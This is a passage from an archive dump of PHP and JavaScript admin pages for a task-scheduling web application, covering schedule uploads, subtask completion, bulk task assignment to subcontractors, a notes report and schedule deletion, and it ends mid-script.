document.addEventListener('DOMContentLoaded', function() { let dropArea = document.getElementById('drop-area'); let overlay = document.getElementById('overlay'); let responseMessage = document.getElementById('responseMessage'); // Prevent default drag behaviors ['dragenter', 'dragover', 'dragleave', 'drop'].forEach(eventName => { dropArea.addEventListener(eventName, preventDefaults, false); }); function preventDefaults(e) { e.preventDefault(); e.stopPropagation(); } // Highlight drop area when item is dragged over it ['dragenter', 'dragover'].forEach(eventName => { dropArea.addEventListener(eventName, highlight, false); }); ['dragleave', 'drop'].forEach(eventName => { dropArea.addEventListener(eventName, unhighlight, false); }); function highlight(e) { dropArea.classList.add('highlight'); } function unhighlight(e) { dropArea.classList.remove('highlight'); } // Handle dropped files dropArea.addEventListener('drop', handleDrop, false); function handleDrop(e) { let dt = e.dataTransfer; let files = dt.files; handleFiles(files); } function handleFiles(files) { const formData = new FormData(); formData.append('csv_file', files[0]); formData.append('current_user_id', <?php echo $companyId; ?>); // Show overlay while uploading overlay.style.display = 'flex'; fetch('../process_upload.php', { method: 'POST', body: formData }).then(response => response.json()) .then(data => { console.log(data); // Hide overlay on response overlay.style.display = 'none'; if (data.success) { Swal.fire({ icon: 'success', title: data.message, text: 'File uploaded successfully' }); } else { Swal.fire({ icon: 'error', title: 'Upload Failed', text: 'File upload failed: ' + data.error }); } // Display response message responseMessage.innerHTML = data.success ? '<div class="alert alert-success">Schedule uploaded successfully.</div>' : '<div class="alert alert-danger">File upload failed: ' + data.error + '</div>'; }).catch(error => { console.error('Error:', error); // Hide overlay on error overlay.style.display = 'none'; Swal.fire({ icon: 'error', title: 'Upload Failed', text: 'An error occurred while uploading the file.' }); // Display error message responseMessage.innerHTML = '<div class="alert alert-danger">An error occurred while uploading the file.</div>'; }); } // Optional: Handle form submission (if needed) document.getElementById('uploadBtn').addEventListener('click', function(e) { e.preventDefault(); handleFiles(document.getElementById('csv_file').files); }); }); </script> <?php include('footer.php'); ?> emeraadmin/submitsubtaskmanually.php000064400000033446151676701240014045 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used // Fetch start and end date from query string $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } // Fetch all subtasks grouped by date $subtasks = $taskService->getAllIncompletedSubtaksGroupByDate($startDate, $endDate); ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css"/> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>Manually Mark Subtasks as Complete</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="#"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">All Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Date Filter and Today Checkbox --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <!-- <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date">--> <input type="date" id="startDate" placeholder="Select start date" class="form-control"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <!-- <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date">--> <input type="date" id="endDate" placeholder="Select end date" class="form-control"> </div> </div> <script> //set max date for end date as today var today = new Date().toISOString().split('T')[0]; document.getElementById('endDate').setAttribute('max', today); </script> <div class="col-md-3"> <div class="col-md-3 d-flex align-items-center "> <div class="form-check form-check-inline"> <div class="row mb-4 border-checkbox-section"> <div class="border-checkbox-group border-checkbox-group-primary"> <label class="border-checkbox-label" for="todayCheckbox">Today</label> <input class="border-checkbox" type="checkbox" id="todayCheckbox" value="today" <?= ($startDate == date('Y-m-d') && $endDate == date('Y-m-d')) ? 'checked' : '' ?>> </div> </div> </div> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> <button type="button" id="resetFilters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <!-- select all checkbox --> <div class="col-md-12"> <div class="row mb-4 border-checkbox-section"> <div class="border-checkbox-group border-checkbox-group-warning"> <input type="checkbox" id="selectall" class="border-checkbox"> <label for="selectall" class="border-checkbox-label">Select All</label> <button class="btn btn-warning" id="markAsComplete">Mark Subtasks as Complete</button> </div> </div> </div> <?php foreach ($subtasks as $date => $subtaskList) { ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?php if ($date == date('Y-m-d')) { echo 'Today'; } else if ($date == date('Y-m-d', strtotime('tomorrow'))) { echo 'Tomorrow'; } else { echo date('l, F j, Y', strtotime($date)); } ?></h3> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="advanced_table_<?php echo strtotime($date); ?>"> <thead> <tr> <th>#</th> <th>ID</th> <th>Service Name</th> <th>Date</th> <th>Time</th> <th>Assigned</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <tr> <td> <input type="checkbox" class="select_all_child" id="selectall_<?php echo strtotime($date); ?>"> </td> <td>ST-000<?= $subtask['id']; ?></td> <td><?= $subtask['service_name']; ?></td> <td><?= $subtask['subtask_date']; ?></td> <td><?= $subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''; ?></td> <td><?= $subtask['assigned'] ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'; ?></td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <?php include('footer.php'); ?> <!-- Include jQuery and Bootstrap Datepicker JS --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script> $(document).ready(function () { // Initialize datepickers $('.datepicker').datepicker({ format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true }); // Function to save filters to localStorage function saveFilters() { var filters = { startDate: $('#startDate').val(), endDate: $('#endDate').val(), todayCheckbox: $('#todayCheckbox').is(':checked') }; localStorage.setItem('dateRangeFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('dateRangeFilters')); if (filters) { $('#startDate').val(filters.startDate); $('#endDate').val(filters.endDate); $('#todayCheckbox').prop('checked', filters.todayCheckbox); } } var endDate = document.getElementById('endDate'); //endDate.max = new Date().toISOString().split("T")[0]; endDate.max = new Date().toLocaleDateString('fr-ca') // Function to reset filters function resetFilters() { $('#startDate').val(''); $('#endDate').val(''); $('#todayCheckbox').prop('checked', false); localStorage.removeItem('dateRangeFilters'); applyDateRangeFilter(); } // Apply date range filter by modifying the URL function applyDateRangeFilter() { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var url = window.location.href.split('?')[0] + '?start_date=' + startDate + '&end_date=' + endDate; window.location.href = url; } // Event handler for applyFilter button $('#applyFilter').on('click', function () { saveFilters(); applyDateRangeFilter(); }); //resetFilters $('#resetFilters').on('click', function () { resetFilters(); }); // Event handler for todayCheckbox $('#todayCheckbox').on('change', function () { if ($(this).is(':checked')) { var today = '<?= date('Y-m-d') ?>'; $('#startDate').val(today); $('#endDate').val(today); } else { $('#startDate').val(''); $('#endDate').val(''); } saveFilters(); applyDateRangeFilter(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> <script> // Mark subtasks as complete $('#markAsComplete').on('click', function () { // Collect checked subtasks, trimming 'ST-000' var checkedSubtasks = []; $('.select_all_child:checked').each(function () { var subtaskId = $(this).closest('tr').find('td:eq(1)').text().trim().replace('ST-000', ''); checkedSubtasks.push(subtaskId); }); if (checkedSubtasks.length === 0) { Swal.fire({ icon: 'error', title: 'No subtasks selected', text: 'Please select subtasks to mark as complete' }); return; } console.log(checkedSubtasks); Swal.fire({ title: 'Are you sure?', text: 'You are about to mark the selected subtasks as complete.', icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, mark as complete', cancelButtonText: 'No, cancel', showLoaderOnConfirm: true, preConfirm: () => { return fetch('mark_subtask_as_completed.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({subtaskIds: checkedSubtasks}) }).then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.json(); }).catch(error => { Swal.showValidationMessage(`Request failed: ${error}`); }); }, allowOutsideClick: () => !Swal.isLoading() }).then((result) => { if (result.isConfirmed) { Swal.fire({ icon: 'success', title: 'Subtasks Marked as Complete', text: 'The selected subtasks have been marked as complete' }).then(() => { // Reload the page after the success message is shown location.reload(); }); } }); }); </script> emeraadmin/bulk_assign_tasks.php000064400000002730151676701240013100 0ustar00<?php // Enable error reporting error_reporting(E_ALL); ini_set('display_errors', 1); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; if ($_SERVER['REQUEST_METHOD'] == 'POST') { if (isset($_POST['companyId']) && isset($_POST['taskIds'])) { $taskIds = explode(',', $_POST['taskIds']); $companyId = $_POST['companyId']; // Create TaskService instance $taskService = new TaskService(); $errors = []; foreach ($taskIds as $taskId) { // Assign the task to the selected company $result = $taskService->assignTaskToCompany($taskId, $companyId); if (!$result) { $errors[] = "Failed to assign task ID: $taskId"; } } if (empty($errors)) { $response = [ 'status' => 'success', 'taskIds' => implode(', ', $taskIds), 'companyId' => $companyId ]; } else { $response = [ 'status' => 'error', 'message' => 'Some tasks could not be assigned.', 'errors' => $errors ]; } echo json_encode($response); } else { echo json_encode(['status' => 'invalid_data', 'message' => 'Invalid data provided']); } } else { echo json_encode(['status' => 'invalid_request', 'message' => 'Invalid request method']); } ?> emeraadmin/report_subtaskswithnotes.php000064400000032760151676701240014577 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; // Initialize necessary services and objects $serviceService = new ServiceService(); $taskService = new TaskService(); $System = new System(); // Fetch services for dropdown $services = $serviceService->getAllServicesForDropdown(); // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Fetch all notes grouped by date $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $subcontractorId = $_GET['subcontractor_id'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } $subtasks = $taskService->getAllSubtasksWithNotesGroupByDate($startDate, $endDate, $subcontractorId, $serviceLocationId); ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css" /> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>Report Submitting Notes</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href=""><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">All Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Date Filter and Today Checkbox --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date" value="<?= htmlspecialchars($startDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date" value="<?= htmlspecialchars($endDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="subcontractorId">Select a Subcontractor:</label> <select id="subcontractorId" name="subcontractorId" class="form-control select2"> <!-- Default option --> <option value="">All Subcontractors</option> <?php // Fetch company list from the database $companies = $taskService->getAllCompanies(); if ($companies) { foreach ($companies as $company) { // Check if subcontractor_id is set in the URL $selected = ''; if (isset($_GET['subcontractor_id']) && $_GET['subcontractor_id'] == $company->id) { $selected = 'selected'; } echo '<option value="' . $company->id . '" ' . $selected . '>' . $company->first_name . ' ' . $company->last_name . '</option>'; } } else { echo '<option value="">No subcontractors available</option>'; } ?> </select> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="serviceLocationId">Select a Service Location:</label> <select id="serviceLocationId" name="serviceLocationId" class="form-control"> <option value="">All Locations</option> <?php // Collect unique regions foreach ($services as $service) { // Check if serviceLocationId is set in the URL $selected = ''; if (isset($_GET['service_location_id']) && $_GET['service_location_id'] == $service->id) { $selected = 'selected'; } echo '<option value="' . htmlspecialchars($service->id) . '" ' . $selected . '>' . htmlspecialchars($service->name) . '</option>'; } ?> </select> </div> </div> <div class="col-md-3 d-flex align-items-center"> <div class="form-check form-check-inline"> <input class="form-check-input" type="checkbox" id="todayCheckbox" value="today" <?= ($startDate == date('Y-m-d') && $endDate == date('Y-m-d')) ? 'checked' : '' ?>> <label class="form-check-label" for="todayCheckbox">Today</label> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <!-- Display subtasks grouped by date --> <?php foreach ($subtasks as $date => $subtaskList) { ?> <?php // Check if all subtasks under this date have empty notes $allEmpty = true; foreach ($subtaskList as $subtask) { if (!empty($subtask['notes'])) { $allEmpty = false; break; } } // If all subtasks have empty notes, skip displaying this section if ($allEmpty) { continue; } ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?php if ($date == date('Y-m-d')) { echo 'Today'; } else if ($date == date('Y-m-d', strtotime('tomorrow'))) { echo 'Tomorrow'; } else { echo date('l, F j, Y', strtotime($date)); } ?></h3> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="advanced_table_<?php echo strtotime($date); ?>"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Subcontractor</th> <th>Date</th> <th>Time</th> <th>Notes</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <?php if (empty($subtask['notes'])) continue; // Skip rows with empty notes ?> <tr class="subtask-row"> <td>ST-000<?= $subtask['id']; ?></td> <td><?= $subtask['service_name']; ?></td> <td><?= $subtask['assigned_user_first_name'].' '.$subtask['assigned_user_last_name']; ?></td> <td><?= $subtask['subtask_date']; ?></td> <td><?= $subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''; ?></td> <td><?= $subtask['notes']; ?></td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <?php include('footer.php'); ?> <!-- Include jQuery and Bootstrap Datepicker JS --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script> $(document).ready(function() { // Initialize datepickers $('.datepicker').datepicker({ format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true }); // Function to save filters to localStorage function saveFilters() { var filters = { startDate: $('#startDate').val(), endDate: $('#endDate').val(), subcontractorId: $('#subcontractorId').val(), serviceLocationId: $('#serviceLocationId').val(), todayCheckbox: $('#todayCheckbox').is(':checked') }; localStorage.setItem('dateRangeFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('dateRangeFilters')); if (filters) { $('#startDate').val(filters.startDate); $('#endDate').val(filters.endDate); $('#subcontractorId').val(filters.subcontractorId); $('#serviceLocationId').val(filters.serviceLocationId); $('#todayCheckbox').prop('checked', filters.todayCheckbox); } } // Function to reset filters function resetFilters() { $('#startDate').val(''); $('#endDate').val(''); $('#subcontractorId').val(''); $('#serviceLocationId').val(''); $('#todayCheckbox').prop('checked', false); localStorage.removeItem('dateRangeFilters'); applyDateRangeFilter(); } // Apply date range filter by modifying the URL function applyDateRangeFilter() { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var subcontractorId = $('#subcontractorId').val(); var serviceLocationId = $('#serviceLocationId').val(); var url = window.location.href.split('?')[0] + '?start_date=' + startDate + '&end_date=' + endDate + '&subcontractor_id=' + subcontractorId + '&service_location_id=' + serviceLocationId; window.location.href = url; } // Event handler for applyFilter button $('#applyFilter').on('click', function() { saveFilters(); applyDateRangeFilter(); }); // Event handler for todayCheckbox $('#todayCheckbox').on('change', function() { if ($(this).is(':checked')) { var today = '<?= date('Y-m-d') ?>'; $('#startDate').val(today); $('#endDate').val(today); } else { $('#startDate').val(''); $('#endDate').val(''); } saveFilters(); applyDateRangeFilter(); }); // Add reset filters button functionality $('#reset_filters').on('click', function() { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> emeraadmin/navbar.php000064400000010126151676701240010641 0ustar00<div class="modal fade apps-modal" id="appsModal" tabindex="-1" role="dialog" aria-labelledby="appsModalLabel" aria-hidden="true" data-backdrop="false"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><i class="ik ik-x-circle"></i></button> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="quick-search"> <div class="container"> <div class="row"> <div class="col-md-4 ml-auto mr-auto"> <div class="input-wrap"> <input type="text" id="quick-search" class="form-control" placeholder="Search..." /> <i class="ik ik-search"></i> </div> </div> </div> </div> </div> <div class="modal-body d-flex align-items-center"> <div class="container"> <div class="apps-wrap"> <div class="app-item"> <a href="#"><i class="ik ik-bar-chart-2"></i><span>Dashboard</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-mail"></i><span>Message</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-users"></i><span>Accounts</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-shopping-cart"></i><span>Sales</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-briefcase"></i><span>Purchase</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-server"></i><span>Menus</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-clipboard"></i><span>Pages</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-message-square"></i><span>Chats</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-map-pin"></i><span>Contacts</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-box"></i><span>Blocks</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-calendar"></i><span>Events</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-bell"></i><span>Notifications</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-pie-chart"></i><span>Reports</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-layers"></i><span>Tasks</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-edit"></i><span>Blogs</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-settings"></i><span>Settings</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-more-horizontal"></i><span>More</span></a> </div> </div> </div> </div> </div> </div> </div>emeraadmin/delete_schedule.php000064400000003177151676701240012516 0ustar00<?php session_start(); // Ensure sessions are started require_once '../../Classes/Database.php'; require_once '../../Service/ScheduleService.php'; require_once '../../Service/UserService.php'; // Include the UserService require_once '../../Classes/System.php'; $System = new System(); $scheduleService = new ScheduleService(); $userService = new UserService(); // Instantiate the UserService // Check if the request is POST and the password is provided if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { // Use the UserService to verify the user's password if ($userService->verifyUserPassword($_SESSION['user_email'], $_POST['password'])) { // Proceed with deletion if (isset($_POST['scheduleId']) && !empty($_POST['scheduleId'])) { $scheduleId = $System->decryptData($_POST['scheduleId']); if (!$scheduleId) { echo "Invalid Schedule ID"; exit; } // Pass the scheduleId and userId (assuming it's stored in session as user_id) $userId = $_SESSION['user_id']; // Fetch the userId from the session // Call the method with both arguments $deleteResult = $scheduleService->deleteScheduleWithTasksByAdmin($scheduleId, $userId); if ($deleteResult === true) { echo "success"; } else { echo $deleteResult; // Echo error message or permission denied } } else { echo "Schedule ID is missing"; } } else { echo "Invalid password"; exit; } } emeraadmin/assigntasks.php000064400000045251151676701240011731 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/UserService.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); // Create UserService instance $UserService = new UserService(); // Initialize filters array $filters = []; // Check for filter inputs and add to the filters array if ($_SERVER['REQUEST_METHOD'] == 'GET') { if (!empty($_GET['service_name'])) { $filters['service_name'] = filter_input(INPUT_GET, 'service_name', FILTER_SANITIZE_STRING); } if (!empty($_GET['region'])) { $filters['region'] = filter_input(INPUT_GET, 'region', FILTER_SANITIZE_STRING); } if (!empty($_GET['frequency'])) { $filters['frequency'] = filter_input(INPUT_GET, 'frequency', FILTER_SANITIZE_STRING); } if (isset($_GET['public']) && $_GET['public'] !== '') { $filters['public'] = filter_input(INPUT_GET, 'public', FILTER_SANITIZE_NUMBER_INT); } } // Fetch tasks from the database based on filters $tasks = $taskService->getAllUnassignedTasks($filters); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Assign Tasks</h5> <span>View all unassigned tasks</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Tasks</li> </ol> </nav> </div> </div> </div> <!-- Search Form --> <div class="row mb-3"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Search Tasks</h3> </div> <div class="card-body"> <form method="GET" action=""> <div class="form-row"> <div class="form-group col-md-2"> <label for="service_name">Service Name</label> <input type="text" class="form-control" id="service_name" name="service_name" placeholder="Enter service name" value="<?php echo htmlspecialchars($_GET['service_name'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="region">Region</label> <input type="text" class="form-control" id="region" name="region" placeholder="Enter region" value="<?php echo htmlspecialchars($_GET['region'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="frequency">Frequency</label> <select class="form-control" id="frequency" name="frequency"> <option value="">Select</option> <option value="daily" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === 'daily') ? 'selected' : ''; ?>>Daily</option> <option value="3x/week" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === '3x/week') ? 'selected' : ''; ?>>3x/week</option> </select> </div> <div class="form-group col-md-2"> <label for="public">Public</label> <select class="form-control" id="public" name="public"> <option value="">Select</option> <option value="1" <?php echo (isset($_GET['public']) && $_GET['public'] === '1') ? 'selected' : ''; ?>>Yes</option> <option value="0" <?php echo (isset($_GET['public']) && $_GET['public'] === '0') ? 'selected' : ''; ?>>No</option> </select> </div> </div> <button type="submit" class="btn btn-primary">Apply Filters</button> <a href="assigntasks.php" class="btn btn-secondary">Clear Filters</a> </form> </div> </div> </div> </div> <!-- End of Search Form --> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th class="nosort" width="10"> <!-- <label class="custom-control custom-checkbox m-0">--> <!-- <input type="checkbox" class="custom-control-input select-all" id="selectall" name="" value="option2">--> <!-- <span class="custom-control-label"> </span>--> <!-- </label>--> </th> <th>#</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created By</th> <th>Created At</th> <th>Assigned</th> <th>Rejected By</th> <th>Public Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (!empty($tasks)): ?> <?php foreach ($tasks as $task): ?> <tr> <td> <label class="custom-control custom-checkbox"> <input type="checkbox" class="custom-control-input select-task" id="task_<?php echo htmlspecialchars($task->id); ?>" name="selected_tasks[]" value="<?php echo htmlspecialchars($task->id); ?>"> <span class="custom-control-label"> </span> </label> </td> <td><?php echo 'TSK-000'.htmlspecialchars($task->id); ?></td> <td><?php echo htmlspecialchars($task->service_name); ?></td> <td><?php echo htmlspecialchars($task->region); ?></td> <td><?php echo htmlspecialchars($task->frequency); ?></td> <td><?php echo htmlspecialchars($task->added_by_name); ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td><?php echo ($task->is_assigned ? '<label class="badge badge-success">Assigned</label>' : '<label class="badge badge-danger">Not Assigned</label>'); ?></td> <td> <?php foreach ($task->not_accepted_users as $userId) { // Fetch and display username based on user ID $userName = $UserService->fetchUserName($userId); // Assuming a function fetchUserName exists echo htmlspecialchars($userName) . '<br>'; } ?> </td> <td><label class="badge badge-<?php echo $task->isPublic ? 'yellow' : 'green'; ?>"><?php echo $task->isPublic ? 'Public' : 'Not Public'; ?></label></td> <td><a href="viewtask.php?id=<?php echo htmlspecialchars($System->encryptData($task->id)); ?>" class="btn btn-primary">View Details</a></td> </tr> <?php endforeach; ?> <?php else: ?> <tr> <td colspan="11">No tasks found.</td> </tr> <?php endif; ?> </tbody> </table> <!-- Assign Task Button --> <button id="assignTaskButton" class="btn btn-success">Assign Task(s)</button> <button id="makePublicButton" class="btn btn-warning">Make Task(s) Public</button> </div> </div> </div> </div> </div> </div> <!-- Modal for Assigning Tasks --> <div class="modal fade" id="AssignTaskModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-lg" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Assign Tasks to subcontractors</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="tasksForm"> <input type="hidden" id="taskIds" name="taskIds"> <div class="form-group"> <label for="companyId">Select a Subcontractor:</label> <select id="companyId" name="companyId" class="form-control select2"> <!-- PHP code to fetch and display companies --> <?php // Fetch company list from the database $companies = $taskService->getAllCompanies(); if ($companies) { foreach ($companies as $company) { echo '<option value="' . $company->id . '">' . $company->first_name . " " . $company->last_name . '</option>'; } } else { echo '<option value="">No subcontractors available</option>'; } ?> </select> </div> </form> <div id="message" class="mt-3"></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="button" id="assignTasksButton" class="btn btn-primary">Assign Tasks</button> </div> </div> </div> </div> <?php include('footer.php'); ?> <script> document.addEventListener('DOMContentLoaded', function () { const checkboxes = document.querySelectorAll('.select-task'); const assignButton = document.getElementById('assignTaskButton'); const modal = new bootstrap.Modal(document.getElementById('AssignTaskModal')); assignButton.addEventListener('click', function () { const selectedTasks = Array.from(checkboxes) .filter(checkbox => checkbox.checked) .map(checkbox => checkbox.value); if (selectedTasks.length > 0) { document.getElementById('taskIds').value = selectedTasks.join(','); modal.show(); } else { Swal.fire({ title: 'No Tasks Selected', text: 'Please select at least one task to assign.', icon: 'warning', confirmButtonText: 'Ok' }); } }); document.getElementById('assignTasksButton').addEventListener('click', function () { const formData = new FormData(document.getElementById('tasksForm')); var selectedCompany = document.getElementById('companyId'); var selectedCompanyName = selectedCompany.options[selectedCompany.selectedIndex].text; // Get the selected company name var numberOfSelectedcheckboxes = Array.from(checkboxes).filter(checkbox => checkbox.checked).length; Swal.fire({ title: 'Are you sure?', html: `You are about to assign the selected tasks to ${selectedCompanyName}.<br>You selected ${numberOfSelectedcheckboxes} tasks.`, icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, Assign', cancelButtonText: 'No, Cancel' }).then((result) => { if (result.isConfirmed) { fetch('bulk_assign_tasks.php', { method: 'POST', body: formData }) .then(response => response.json()) .then(data => { if (data.status === 'success') { Swal.fire({ title: 'Tasks Assigned Successfully', text: 'Task assigned to company successfully.', icon: 'success', confirmButtonText: 'Ok' }).then(() => { window.location.reload(); }); } else { Swal.fire({ title: 'Error', text: data.message || 'Failed to assign tasks. Please try again.', icon: 'error', confirmButtonText: 'Ok' }); } }) .catch(error => { console.error('Error assigning tasks:', error); Swal.fire({ title: 'Error', text: error.message || 'Failed to assign tasks. Please try again.', icon: 'error', confirmButtonText: 'Ok' }); }); } }); }); const makePublicButton = document.getElementById('makePublicButton'); let taskids = []; checkboxes.forEach(checkbox => { checkbox.addEventListener('change', function () { if (checkbox.checked) { taskids.push(checkbox.value); } else { taskids = 